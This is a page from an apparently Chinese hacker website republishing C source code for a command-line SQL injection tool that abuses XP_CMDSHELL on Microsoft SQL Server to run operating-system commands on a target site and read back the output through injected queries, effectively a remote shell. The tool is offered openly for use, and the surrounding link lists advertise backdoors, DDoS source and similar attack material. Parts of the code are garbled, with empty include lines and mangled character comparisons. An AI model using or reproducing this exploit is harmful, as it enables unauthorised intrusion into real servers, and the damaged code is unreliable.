·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]Sql注入SA权限CMD终结者C源码

热荐 ★★★★★

Sql注入SA权限CMD终结者C源码

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-5-27 7:38:52

Poered By CoolDiyer
//　　由于时间问题，没加注释学过C的应该都能看懂
//////////////////////////////////////////////////////////////////////////////////////////////////////
#include
#include
#include
#include
#pragma comment(lib, "wininet.lib")

char *injurl,*type,*end;
char *GetResult(char *url)
{
　 char buffer[1024*8];
　 DWORD dwBytesRead=0;
　 HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
　 HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
　 BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
　 InternetCloseHandle(hUrlFile);
　 InternetCloseHandle(hNet);
　 return buffer;
}
char *ExecCommand(char *cmd)
{
　 char url[1024],buff[1024],result[1024],*response,*p,*p1;
　 int n=1,i,j;
　 memset(url,0,sizeof(url));
　 wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL %s;insert into [SIC_Tmp] values ([g_over])--",injurl,type,cmd);
　 response=GetResult(url);
　 while(1){
　 memset(buff,0,sizeof(buff));
　 memset(result,0,sizeof(result));
　 wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then [CoolDiyer][CoolDiyer] else [CoolDiyer]%%2BResultTxt%%2B[CoolDiyer] end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
　 response=GetResult(url);
　 if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
　　　 else {
　　　　　　　 puts("Cannt Injection It");
　　　　　　　 return;
　　　 }
　 strncpy(buff,p+11,p1-p-11);
　 if (!strcmp(buff,"[g_over]")){
　　　 wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
　　　 GetResult(url);
　　　 return;
　 }
　 //filter
　 for(i=0,j=0;i　　　　if(buff==& && buff[i+2]==t && buff[i+3]==;){
　　　　　 if (buff[i+1]==l)result[j]=<;
　　　　　 if (buff[i+1]==g)result[j]=>;
　　　　　 i+=3;
　　　 }
　　　 else if(buff==& && buff[i+1]==q && buff[i+2]==u && buff[i+3]==o && buff[i+4]==t && buff[i+5]==;){
　　　　　 result[j]=";
　　　　　 i+=5;
　　　 }
　　　　　 else result[j]=buff;
　　　 }
　 puts(result);
　 memset(url,0,sizeof(url));
　 n++;
　 }
}
void main(int argc,char **argv)
{
　 char cmd[1024];
　　　 printf("=[Sql Inj CMD]======================================================\n");
　　　 printf("\tSQL Injection Command Exploit Powered By CoolDiyer\n\n");
　　　 if(argc!=3){
　　　 printf("\tUsage:　sqlcmd.exe \n");
　　　 printf("\t\tType:\t0->Number　　1->char　　2->Search\n");
　　　 printf("\tExample:\n\t\tsqlcmd.exe http://localhost/index.asp?id=1 0\n");
　　　 printf("=05-12-22===========================================================\n");
　　　 return;
　 }
　 injurl=argv[1];
　 if(atoi(argv[2])==0){
　　　 type="";
　　　 end="";
　 }
　 if(atoi(argv[2])==1){
　　　 type="";
　　　 end=" and =";
　 }
　 if(atoi(argv[2])==2){
　　　 type="%";
　　　 end=" and %=";
　 }
　 while (1)
　 {
　 printf("Sql Inj CMD>");
　 gets(cmd);
　 if (!strcmpi(cmd,"exit"))return;
　 ExecCommand(cmd);
　 }
}

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：利用VB实现对IE的调用与控制

下一篇文章：国外的第一只flash病毒的源代码

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02
每秒4W的DDOS源码	06-08
从内存中加载并启动一个exe(Delp	06-05